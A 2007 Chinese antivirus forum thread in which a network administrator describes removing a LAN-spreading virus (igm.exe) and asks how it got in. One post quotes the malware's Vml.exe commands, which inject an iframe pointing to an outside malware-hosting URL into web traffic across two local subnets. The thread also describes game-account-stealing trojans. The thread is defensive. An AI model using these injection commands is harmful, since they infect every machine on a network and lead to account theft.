全部撤退 - 2007-10-31 10:35:00
最近一个月不时听到这个病毒如何歹毒,还能突破还原软件,心里七上八下的。
昨天还是遇到了,网管说有台机器很卡,我一看有igm.exe是中了,查看了病毒生成时间,
问网管有没打开还原系统,他说更新了杀毒软件,3分钟不到就关了,其他什么也没动。
我查了ie缓存,里面只有一个test.cer的文件,是病毒的下载地址,文件aa1.exe到aa19.exe,没找到执行这个下载列表的脚本和程序。
没想那么多,先把2个下载地址给屏蔽了。手工杀了1个小时才把病毒全部赶掉。
和其他朋友说的不一样的是 我在“C:\Documents and Settings\user\”,”C:\Documents and Settings\user\Local Settings\“,“C:\Program Files\Common Files\”,“C:\Program Files\Internet Explorer\PLUGINS\”文件夹下也都发现了病毒,文件名为*.tmp和nv*.dll(具体名字忘记了)
不过百思不得其解的是,不知道它是怎么进到电脑里来的。默认的共享管道都关了,补丁也打全了,也没找到autorun.inf 莫非病毒还能劫持升级服务器数据?加塞代码
[用户系统信息]Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
khh2007 - 2007-10-31 21:00:00
forum.ikaka.com/topic.asp?board=28&artid=8386770
哈哈,这里有讲到
全部撤退 - 2007-11-15 11:39:00
代码:Vml.exe -idx 0 -ip 192.168.0.1-192.168.0.254 -port 80 -insert "<iframe src='http://xx.exiao01.com/2.htm' width=20 height=1></iframe>"
Vml.exe -idx 0 -ip 192.168.1.1-192.168.1.254 -port 80 -insert "<iframe src='http://xx.exiao01.com/2.htm' width=20 height=1></iframe>"
exit
======================================
那位知道他是利用什么漏洞注入代码的?
全部撤退 - 2007-11-15 12:32:00
对于没打补丁的局域网来说真的是噩梦啊!
病毒很顽固,传的又快,
还能破不少还原卡和还原软件,
变种多,杀软杀不干净
全部撤退 - 2007-11-15 12:42:00
下载的木马都是盗的流行的热门游戏,而且象魔兽世界还可以饶过密保卡,脱离客户端利用自编软件盗号非常迅速,1分钟完成。
象这类明显是盗号集团有组织的行为,
发现造成损失的,应该提交公安部门立案追查。
© 2000 - 2026 Rising Corp. Ltd.